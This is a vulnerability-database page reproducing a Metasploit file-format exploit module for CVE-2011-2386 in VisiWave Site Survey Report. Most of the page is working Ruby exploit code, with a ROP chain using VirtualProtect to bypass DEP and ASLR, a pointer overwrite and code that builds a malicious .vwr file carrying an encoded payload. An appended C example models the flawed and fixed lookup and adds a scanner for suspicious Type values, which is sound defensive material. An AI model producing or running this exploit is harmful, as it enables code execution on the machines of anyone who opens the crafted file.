VisiWave VWR File Parsing Vulnerability

Published: 23 May 2011 16:28:38
Reported by: mr_me, TecR0c
Type: metasploit
Source: www.rapid7.com (13 views)

VisiWave VWR File Parsing Vulnerability allows code execution via malicious files

Related

Reporter                Title                                                          Published          Family
Circl                   CVE-2011-2386                                                  23 May 2011 00:00  circl
Check Point Advisories  VisiWave VWR File Parsing (CVE-2011-2386)                      5 Oct 2014 00:00   checkpoint_advisories
CVE                     CVE-2011-2386                                                  8 Jun 2011 10:00   cve
Cvelist                 CVE-2011-2386                                                  8 Jun 2011 10:00   cvelist
NVD                     CVE-2011-2386                                                  8 Jun 2011 10:36   nvd
OpenVAS                 VisiWave Site Survey Arbitrary Code Execution Vulnerability    13 Jun 2011 00:00  openvas
Prion                   Null pointer dereference                                       8 Jun 2011 10:36   prion
RedhatCVE               CVE-2011-2386                                                  22 May 2025 09:51  redhatcve
Tenable Nessus          VisiWave Site Survey Report VWR File Handling Overflow         25 May 2011 00:00  nessus

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VisiWave VWR File Parsing Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in VisiWave's Site Survey Report application.
        When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'
        property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',
        'Image'), but if a match isn't found, the function that's supposed to handle this routine
        ends up returning the input as a pointer, which is later used in a CALL DWORD PTR [EDX+10]
        instruction.  This allows attackers to overwrite it with any arbitrary value, resulting in code
        execution.  A patch is available at visiwave.com; the fix is done by XORing the return value as
        null if no match is found, and then it is validated before use.

        NOTE: During installation, the application will register two file handlers, VWS and VWR, which allow a
        victim user to 'double click' the malicious VWR file and execute code.  This module was also built
        to bypass ASLR and DEP.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me <steventhomasseeley[at]gmail.com>',  # original discovery & msf exploit
          'TecR0c <roccogiovannicalvi[at]gmail.com>'  # msf exploit
        ],
      'References'     =>
        [
          [ 'CVE', '2011-2386' ],
          [ 'OSVDB', '72464'],
          [ 'URL', 'http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html' ],
          [ 'URL', 'http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20'],
        ],
      'Payload'        =>
        {
          'Space'       => 2000,
          'BadChars'    => "\x00\x0a\x0d",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows XP SP3/Windows 7 SP0',
            {
              'Offset' => 3981,         # offset to rop gadgets
              'Pointer' => 0x007AF938,  # POP R32; POP R32; POP R32; ADD ESP 50; RETN ("magic" pointer)
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-05-20',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.vwr']),
      ])
  end

  def exploit

    # Allowing nulls in our rop chain is like giving gold to midas.
    # instructions taken from the applications non aslr modules
    # libcurl.dll, VisiWaveReport.exe and blah blah
    rop_gadgets =
    [
      0x1001AFBD,  # INC EBP; PUSH ESP; POP EDI; POP ESI; POP EBP; POP EBX; RET
      0xc0fff333,  # junk
      0xc0fff333,  # junk
      0x000004cf,  # lwSize 1231 bytes
      0x100017DD,  # POP ECX; RETN
      0x10037a60,  # Writeable address from .data of libcurl.dll
      0x10011104,  # POP EDX; RETN
      0x00000040,  # RWX for VirtualProtect()
      0x10026E4D,  # MOV EAX,EDI # POP EDI # RETN
      0x10002ac6,  # RETN
      0x10022641,  # ADD EAX, 20; RETN
      0x10022641,  # ADD EAX, 20; RETN
      0x10022641,  # ADD EAX, 20; RETN
      0x10022641,  # ADD EAX, 20; RETN
      0x10022641,  # ADD EAX, 20; RETN
      0x10022641,  # ADD EAX, 20; RETN
      0x004048B1,  # XCHG EAX,EBP
      0x1001BD3F,  # POP EAX; RETN
      0x10032048,  # IAT Address - constant pointer to VirtualProtect()
      0x1000FA4A,  # MOV EAX,DWORD PTR DS:[EAX]; RETN
      0x00657fd7,  # XCHG EAX,ESI; RETN
      0x1000af40,  # PUSHAD; RET
    ].pack("V*")

    # grab the pointer to our buffer
    pointer = [target["Pointer"]].pack("V")

    sploit = pointer  # begin life in EDX
    sploit << rand_text_alphanumeric(target["Offset"])  # massive offset
    sploit << rop_gadgets      # rop chain
    sploit << make_nops(300)   # safe landing
    sploit << payload.encoded  # profit!

    vwr_data = "FileType: SSREPORT\r\n"
    vwr_data << "Product: VisiWave Site Survey, 1.6.5 Beta\r\n"
    vwr_data << "FileVersion: 10\r\n"
    vwr_data << "Item: Global Properties\r\n"
    vwr_data << "Checked: 1\r\n"
    vwr_data << "Type: #{sploit}\r\n"
    vwr_data << "SurveyFile: C:\\Program Files\\VisiWave Site Survey\\Samples\\SampleData.vws\r\n"
    vwr_data << "FloorPlanImageReport: C:\\WINDOWS\\Web\\bullet.gif\r\n"
    vwr_data << "DefaultOrientation: 0\r\n"
    vwr_data << "Header:\r\n"
    vwr_data << "Footer:\r\n"
    vwr_data << "LeftMargin: 100\r\n"
    vwr_data << "RightMargin: 100\r\n"
    vwr_data << "TopMargin: 50\r\n"
    vwr_data << "BottomMargin: 50\r\n"
    vwr_data << "Item: #{rand_text_alpha(3)}\r\n"
    vwr_data << "Checked: 1\r\n"

    print_status("Creating '#{datastore['FILENAME']}'...")
    file_create(vwr_data)
  end
end
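The trusted-pointer pattern the module description explains, and the Type values the generated file carries, as an added example in C that is not VisiWave's code and not part of the Metasploit module above: a model of the lookup that hands its input back as a pointer when no Type matches, beside the hardened form that returns NULL and is checked before use, plus a small scanner that flags Type values in VWR text which the hardened lookup would reject. The struct and function names, the 32-byte length limit and the sample file content are assumptions made for this example.

```c
/* Added example, not VisiWave's code and not part of the Metasploit module.
 * It models the 'Type' property lookup the module description explains:
 * the vulnerable routine hands the caller's input back as a pointer when no
 * type matches, while the fixed routine returns NULL and the caller checks it.
 * A small scanner then flags Type values in VWR text that the fixed lookup
 * would reject. Struct and function names, the length limit and the sample
 * file content are all assumptions made for this example. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define MAX_TYPE_LEN 32   /* assumed sanity limit for a Type value */

typedef struct report_item {
    const char *name;
    int (*render)(const struct report_item *self); /* reached through the item pointer */
} report_item;

static int render_stub(const report_item *self) { (void)self; return 0; }

/* The valid Type names listed in the module description. */
static const report_item ITEMS[] = {
    { "Properties", render_stub }, { "TitlePage", render_stub },
    { "Details",    render_stub }, { "Graph",     render_stub },
    { "Table",      render_stub }, { "Text",      render_stub },
    { "Image",      render_stub },
};
#define N_ITEMS (sizeof ITEMS / sizeof ITEMS[0])

/* Vulnerable pattern: on no match the input string itself is returned as a
 * report_item pointer, so attacker-controlled bytes later get dereferenced. */
const report_item *lookup_vulnerable(const char *type)
{
    for (size_t i = 0; i < N_ITEMS; i++)
        if (strcmp(type, ITEMS[i].name) == 0) return &ITEMS[i];
    return (const report_item *)type;   /* BUG: never call through this */
}

/* Hardened pattern: an unknown Type yields NULL. */
const report_item *lookup_fixed(const char *type)
{
    for (size_t i = 0; i < N_ITEMS; i++)
        if (strcmp(type, ITEMS[i].name) == 0) return &ITEMS[i];
    return NULL;
}

/* The caller validates before use: 0 on success, -1 for an unknown Type. */
int dispatch_fixed(const char *type)
{
    const report_item *item = lookup_fixed(type);
    if (item == NULL) return -1;
    return item->render(item);
}

/* Counts "Type: ..." lines in CRLF-separated VWR text whose value is either
 * longer than MAX_TYPE_LEN or not one of the known item names. */
int count_suspicious_types(const char *vwr)
{
    int bad = 0;
    const char *p = vwr;
    while (*p != '\0') {
        const char *eol = strstr(p, "\r\n");
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len > 6 && strncmp(p, "Type: ", 6) == 0) {
            size_t vlen = len - 6;
            char value[MAX_TYPE_LEN];
            if (vlen >= MAX_TYPE_LEN) {
                bad++;                                    /* oversized value */
            } else {
                memcpy(value, p + 6, vlen);
                value[vlen] = '\0';
                if (lookup_fixed(value) == NULL) bad++;   /* unknown name */
            }
        }
        if (eol == NULL) break;
        p = eol + 2;
    }
    return bad;
}

/* Constructed sample: one valid Type, one unknown, one oversized. */
static const char SAMPLE_VWR[] =
    "FileType: SSREPORT\r\n"
    "Item: Global Properties\r\n"
    "Checked: 1\r\n"
    "Type: Graph\r\n"
    "Type: Bogus\r\n"
    "Type: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n"
    "Item: xyz\r\n";

int main(void)
{
    printf("suspicious Type lines in sample: %d\n", count_suspicious_types(SAMPLE_VWR));
    printf("dispatch_fixed(\"Bogus\") -> %d\n", dispatch_fixed("Bogus"));
    return 0;
}
```

The scanner deliberately reuses the hardened lookup as its allow-list, so a file is flagged for exactly the inputs the fixed routine would refuse; the length check catches the long-value case independently of the name check, since the vendor fix described above (null on no match, validated before use) does not by itself limit how large a Type value the parser reads.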
